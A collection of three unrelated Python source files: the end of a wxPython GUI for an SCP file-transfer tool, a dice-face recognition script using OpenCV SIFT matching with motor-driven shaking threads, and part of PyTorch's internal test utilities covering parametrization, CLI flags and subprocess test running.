wx.OK|wx.ICON_INFORMATION)
def on_log(self, log):
wx.CallAfter(self.txt_log.Enable)
wx.CallAfter(self.txt_log.AppendText, log)
wx.CallAfter(self.txt_log.AppendText, '\n')
wx.CallAfter(self.txt_log.Disable)
def on_source_browse(self, event):
dlg = wx.DirDialog (None, "Choose source directory", "",
wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST)
if dlg.ShowModal() == wx.ID_OK:
self.txt_Source.SetValue(dlg.GetPath())
def on_destination_browse(self, event):
dlg = wx.DirDialog (None, "Choose destination directory", "",
wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST)
if dlg.ShowModal() == wx.ID_OK:
self.txt_Destination.SetValue(dlg.GetPath())
def on_key_browse(self, event):
dlg = wx.FileDialog (None, "Choose private key file",
style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)
if dlg.ShowModal() == wx.ID_OK:
self.txt_ssh_key.SetValue(dlg.GetPath())
def on_start_click(self, event):
self.app.source_path = self.txt_Source.GetValue()
self.app.export_path = self.txt_Destination.GetValue()
self.app.recursive = self.chk_recursive.GetValue()
self.app.ignore_existing = self.chk_igexist.GetValue()
self.app.batch_size = self.int_batch_size.GetValue()
self.app.batch_offset = self.int_batch_offset.GetValue()
self.app.delay = self.int_delay.GetValue()
self.app.regex = self.txt_file_regex
self.app.batch_prefix = self.txt_batch_prefix.GetValue()
if self.app.is_startable():
if self.app.start_watchdog():
for child in self.panel.GetChildren():
if hasattr(child, 'Disable'):
child.Disable()
self.btn_Stop.Enable()
def on_stop_click(self, event):
if self.app.stop_watchdog():
for child in self.panel.GetChildren():
if hasattr(child, 'Enable'):
child.Enable()
self.btn_Stop.Disable()
if __name__ == '__main__':
app = wx.App()
app_main = app_window(None, title='NanoSCP')
app.MainLoop()
exit()
|
detect.py
|
import cv2
import numpy as np
import subprocess
import threading
import time
import image
import motor
sides=6
def match_img(flann, scene, needle):
matches = flann.knnMatch(needle.descriptors,scene.descriptors,k=2)
good = []
for m,n in matches:
if m.distance < 0.7*n.distance:
good.append(m)
if len(good) >= 9:
src_pts = np.float32([ needle.keypoints[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
dst_pts = np.float32([ scene.keypoints[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
matches_mask = mask.ravel().tolist()
h,w,depth = needle.img.shape
pts = np.float32([[0,0], [0,h-1], [w-1,h-1], [w-1,0]]).reshape(-1,1,2)
dst = cv2.perspectiveTransform(pts, M)
drawn = scene.img
cv2.polylines(drawn, [np.int32(dst)], True, 255, 3, cv2.CV_AA)
return (True, M, drawn, mask, good)
else:
return (False, None, scene.img, None, good)
def detect_side(dice, img):
global disp_img
global cv_display
image.process(sift, img)
num = [ 0 for i in range(sides) ]
for i in range(sides):
rv, M, img.img, mask, good = match_img(flann, img, dice[i])
if rv:
num[i] += len(good)
ret = -1
if sum(num) != 0:
for n in range(sides):
if num[n]*3 >= sum(num)*2:
ret = n
break
if ret != -1:
img.img[0:dice[ret].img.shape[0],
0:dice[ret].img.shape[1]] = dice[ret].img
cv_display.acquire()
disp_img = img.img
cv_display.notify()
cv_display.release()
print(num)
return ret, img
cv_shake = threading.Condition()
cv_grab = threading.Condition()
cv_process = threading.Condition()
grabbed_image = None
cv_display = threading.Condition()
disp_img = None
do_shake = False
do_grab = False
do_process = False
running = True
def shake_thread():
print("Shake thread started")
global do_shake
global do_grab
global running
while running:
cv_shake.acquire()
if do_shake == False:
cv_shake.wait()
motor.shake()
do_shake = False
cv_grab.acquire()
do_grab = True
cv_grab.notify()
cv_grab.release()
cv_shake.release()
def grab_thread():
global grabbed_image
global do_shake
global do_grab
global do_process
global running
print("Grab thread started")
while running:
cv_grab.acquire()
if do_grab == False:
cv_grab.wait()
tmp = image.grab_image()
do_grab = False
cv_shake.acquire()
do_shake = True
cv_shake.notify()
cv_shake.release()
cv_process.acquire()
do_process = True
grabbed_image = tmp
cv_process.notify()
cv_process.release()
cv_grab.release()
def display_thread():
global cv_display
global disp_img
global running
i = None
while running and i == None:
cv_display.acquire()
cv_display.wait()
if disp_img != None:
i = disp_img
cv2.imshow('frame', i)
disp_img = None
cv_display.release()
while running:
cv_display.acquire()
if disp_img != None:
i = disp_img
cv2.imshow('frame', i)
disp_img = None
cv_display.release()
key = cv2.waitKey(20) & 0xFF
if key == ord('q'):
running = False
cv2.namedWindow('frame', cv2.WINDOW_NORMAL)
sift = cv2.SIFT()
dice = [ image.open_image("%d.jpg" % (i,), i) for i in range(1, sides + 1) ]
[ image.process(sift, i) for i in dice ]
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)
search_params = dict(checks = 50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
motor.init("/dev/ttyUSB0", 9600)
threading.Thread(target = shake_thread).start()
threading.Thread(target = grab_thread).start()
threading.Thread(target = display_thread).start()
cv_shake.acquire()
cv_shake.notify()
cv_shake.release()
num = [0 for i in range(sides) ]
nums = []
added = 0
log = open('log', 'a')
while running:
cv_process.acquire()
print("Acquired process lock")
if do_process == False:
print("Wait for image")
cv_process.wait()
tmp = grabbed_image
do_process = False
print("Processing")
n, img = detect_side(dice, tmp)
cv_process.release()
print("Released process lock\n")
if n != -1:
num[n] += 1
log.write("%d\n" % (n, ))
log.flush()
added += 1
else:
cv2.imwrite("failure.png", img.img)
if added > 0:
print(n, [int(n * 100. / added) for n in num])
|
common_utils.py
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
import __main__ # type: ignore[import]
import errno
import ctypes
from typing import cast, Any, Dict, Iterable, Iterator, Optional, Union, List
from unittest.mock import MagicMock
import numpy as np
import expecttest
from .._core import \
(_compare_tensors_internal, _compare_scalars_internal, _compare_return_type)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from statistics import mean
import functools
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
class _TestParametrizer(object):
"""
Decorator class for parametrizing a test function, yielding a set of new tests spawned
from the original generic test, each specialized for a specific set of test inputs. For
example, parametrizing a test across the set of ops will result in a test function per op.
The decision of how to parametrize / what to parametrize over is intended to be implemented
by each derived class.
In the details, the decorator adds a 'parametrize_fn' property to the test function that is called
during device-specific test instantiation performed in instantiate_device_type_tests(). Because of this,
there is no need to parametrize over device type, as that is already handled separately.
If the decorator is applied to a test function that already has a 'parametrize_fn' property, a new
composite 'parametrize_fn' will be created that generates tests with the product of the parameters
generated by the old and new parametrize_fns. This allows for convenient composability of decorators.
Args:
handles_dtypes (bool): If True, indicates that it is the responsibility of the decorator to handle
dtypes internally. This allows for more flexibility when needed (e.g. for op-specific dtype handling).
Default: True
"""
def __init__(self, handles_dtypes=True):
self.handles_dtypes = handles_dtypes
def _parametrize_test(self, test, generic_cls, device_cls):
"""
Parametrizes the given test function across whatever dimension is specified by the derived class.
Tests can be parametrized over any arbitrary dimension or combination of dimensions, such as all
ops, all modules, or all ops + their associated dtypes.
Args:
test (fn): Test function to parametrize over
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
device_cls (class): Device-specialized test class object (e.g. TestFooCPU); set to None
if the tests are not part of a device-specific set
Returns:
Generator object returning 3-tuples of:
test (fn): Parametrized test function; must support a device arg and args for any params
test_name (str): Parametrized suffix for the test (e.g. opname_int64); will be appended to
the base name of the test
param_kwargs (dict): Param kwargs to pass to the test (e.g. {'op': 'add', 'dtype': torch.int64})
"""
raise NotImplementedError
def __call__(self, fn):
if hasattr(fn, 'parametrize_fn'):
# Do composition with the product of args.
old_parametrize_fn = fn.parametrize_fn
new_parametrize_fn = self._parametrize_test
def composite_fn(test, generic_cls, device_cls,
old_parametrize_fn=old_parametrize_fn,
new_parametrize_fn=new_parametrize_fn):
old_tests = [(test, test_name, param_kwargs) for (test, test_name, param_kwargs) in
old_parametrize_fn(test, generic_cls, device_cls)]
for (old_test, old_test_name, old_param_kwargs) in old_tests:
for (new_test, new_test_name, new_param_kwargs) in \
new_parametrize_fn(old_test, generic_cls, device_cls):
full_param_kwargs = {**old_param_kwargs, **new_param_kwargs}
yield (new_test, '{}_{}'.format(new_test_name, old_test_name), full_param_kwargs)
fn.parametrize_fn = composite_fn
old_handles_dtypes = fn.handles_dtypes if hasattr(fn, 'handles_dtypes') else False
if self.handles_dtypes and old_handles_dtypes:
raise RuntimeError('Cannot compose multiple parametrization decorators that handle dtypes; '
'their dtype handling conflicts')
fn.handles_dtypes = self.handles_dtypes or old_handles_dtypes
else:
fn.parametrize_fn = self._parametrize_test
fn.handles_dtypes = self.handles_dtypes
return fn
def instantiate_parametrized_tests(generic_cls):
"""
Instantiates tests that have been decorated with a parametrize_fn. This is generally performed by a
decorator subclass of _TestParametrizer. The generic test will be replaced on the test class by
parametrized tests with specialized names.
Args:
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
"""
for attr_name in tuple(dir(generic_cls)):
class_attr = getattr(generic_cls, attr_name)
if not hasattr(class_attr, 'parametrize_fn'):
continue
if hasattr(class_attr, 'handles_dtypes') and class_attr.handles_dtypes:
raise RuntimeError('instantiate_parametrized_tests() should not be used with decorators '
'that handle dtypes internally (e.g. @ops, @modules, etc.). Use '
'instantiate_device_type_tests() with these instead.')
# Remove the generic test from the test class.
delattr(generic_cls, attr_name)
# Add parametrized tests to the test class.
def instantiate_test_helper(cls, name, test, param_kwargs):
@wraps(test)
def instantiated_test(self, param_kwargs=param_kwargs):
test(self, **param_kwargs)
assert not hasattr(generic_cls, name), "Redefinition of test {0}".format(name)
setattr(generic_cls, name, instantiated_test)
for (test, test_suffix, param_kwargs) in class_attr.parametrize_fn(
class_attr, generic_cls=generic_cls, device_cls=None):
full_name = '{}_{}'.format(test.__name__, test_suffix)
instantiate_test_helper(cls=generic_cls, name=full_name, test=test, param_kwargs=param_kwargs)
class subtest(object):
"""
Explicit subtest case for use with test parametrization.
Allows for explicit naming of individual subtest cases as well as applying
decorators to the parametrized test.
Args:
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name (str): Optional name to use for the test.
decorators (iterable): Iterable of decorators to apply to the generated test.
"""
__slots__ = ['arg_values', 'name', 'decorators']
def __init__(self, arg_values, name=None, decorators=None):
self.arg_values = arg_values
self.name = name
self.decorators = decorators if decorators else []
class parametrize(_TestParametrizer):
"""
Decorator for applying generic test parametrizations.
The interface for this decorator is modeled after `@pytest.mark.parametrize`.
Basic usage between this decorator and pytest's is identical. The first argument
should be a string containing comma-separated names of parameters for the test, and
the second argument should be an iterable returning values or tuples of values for
the case of multiple parameters.
Beyond this basic usage, the decorator provides some additional functionality that
pytest does not.
1. Parametrized tests end up as generated test functions on unittest test classes.
Since this differs from how pytest works, this decorator takes on the additional
responsibility of naming these test functions. The default test names consists of
the test's base name followed by each parameter name + value (e.g. "test_bar_x_1_y_foo"),
but custom names can be defined using `name_fn` or the `subtest` structure (see below).
2. The decorator specially handles parameter values of type `subtest`, which allows for
more fine-grained control over both test naming and test execution. In particular, it can
be used to tag subtests with explicit test names or apply arbitrary decorators (see examples
below).
Examples::
@parametrize("x", range(5))
def test_foo(self, x):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')])
def test_bar(self, x, y):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')],
name_fn=lambda x, y: '{}_{}'.format(x, y))
def test_bar_custom_names(self, x, y):
...
@parametrize("x, y", [subtest((1, 2), name='double'),
subtest((1, 3), name='triple', decorators=[unittest.expectedFailure]),
subtest((1, 4), name='quadruple')])
def test_baz(self, x, y):
...
Args:
arg_str (str): String of arg names separate by commas (e.g. "x,y").
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name_fn (callable): Optional function that takes in parameters and returns subtest name.
"""
def __init__(self, arg_str, arg_values, name_fn=None):
super().__init__(handles_dtypes=False)
self.arg_names = arg_str.split(',')
self.arg_values = arg_values
self.name_fn = name_fn
def _formatted_str_repr(self, name, value):
""" Returns a string representation for the given arg that is suitable for use in test function names. """
if isinstance(value, torch.dtype):
return dtype_name(value)
elif isinstance(value, torch.device):
return str(value)
# Can't use isinstance as it would cause a circular import
elif value.__class__.__name__ == 'OpInfo' or value.__class__.__name__ == 'ModuleInfo':
return value.formatted_name
else:
# Include name and value separated by underscore.
return '{}_{}'.format(name, str(value).replace('.', '_'))
def _default_subtest_name(self, values):
return '_'.join([self._formatted_str_repr(a, v) for a, v in zip(self.arg_names, values)])
def _get_subtest_name(self, values, explicit_name=None):
if explicit_name:
subtest_name = explicit_name
elif self.name_fn:
subtest_name = self.name_fn(*values)
else:
subtest_name = self._default_subtest_name(values)
return subtest_name
def _parametrize_test(self, test, generic_cls, device_cls):
if len(self.arg_names) == 0:
# No additional parameters needed for the test.
test_name = device_cls.device_type if device_cls else ''
yield (test, test_name, {})
else:
# Each "values" item is expected to be either:
# * A tuple of values with one for each arg. For a single arg, a single item is expected.
# * A subtest instance with arg_values matching the previous.
for values in self.arg_values:
maybe_name = None
if isinstance(values, subtest):
sub = values
values = sub.arg_values
maybe_name = sub.name
# Apply decorators.
@wraps(test)
def test_wrapper(*args, **kwargs):
return test(*args, **kwargs)
for decorator in sub.decorators:
test_wrapper = decorator(test_wrapper)
gen_test = test_wrapper
else:
gen_test = test
values = list(values) if len(self.arg_names) > 1 else [values]
if len(values) != len(self.arg_names):
raise RuntimeError('Expected # values == # arg names, but got: {} '
'values and {} names for test "{}"'.format(
len(values), len(self.arg_names), test.__name__))
param_kwargs = {
name: value for name, value in zip(self.arg_names, values)
}
subtest_name = self._get_subtest_name(values, explicit_name=maybe_name)
test_name = '{}{}'.format(subtest_name, '_' + device_cls.device_type if device_cls else '')
if '.' in test_name:
raise RuntimeError('Test name cannot contain periods, but got: {}'.format(test_name))
yield (gen_test, test_name, param_kwargs)
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
# TODO fix when https://github.com/python/mypy/issues/2427 is address
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser()
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following cool snippet is copied from Py3 core library subprocess.call
# only the with
# 1. `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
# `p.wait()` in a `final` block for the code to be portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
# Used to run the same test with different tensor types
def repeat_test_for_types(dtypes):
def repeat_helper(f):
@wraps(f)
def call_helper(self, *args):
for dtype in dtypes:
with TestCase.subTest(self, dtype=dtype):
f(self, *args, dtype=dtype)
return call_helper
return repeat_helper
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def _print_test_names():
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
strip_py = re.sub(r'.py$', '', filename)
return re.sub('/', r'.', strip_py)
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
_print_test_names()
elif TEST_IN_SUBPROCESS:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
failed_tests = []
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
exitcode = shell([sys.executable] + argv + [test_case_full_name])
if exitcode != 0:
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "avx512vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name: str) -> bool:
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
try:
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
except ImportError:
return False
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
BUILD_WITH_CAFFE2 = _check_module_exists("caffe2.python.caffe2_pybind11_state")
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
# Disables noarch tests; all but one CI configuration disables these. We don't
# disable them for local runs because you still want to run them
# (unlike slow tests!)
TEST_SKIP_NOARCH = os.getenv('PYTORCH_TEST_SKIP_NOARCH', '0') == '1'
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests for when on Github Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
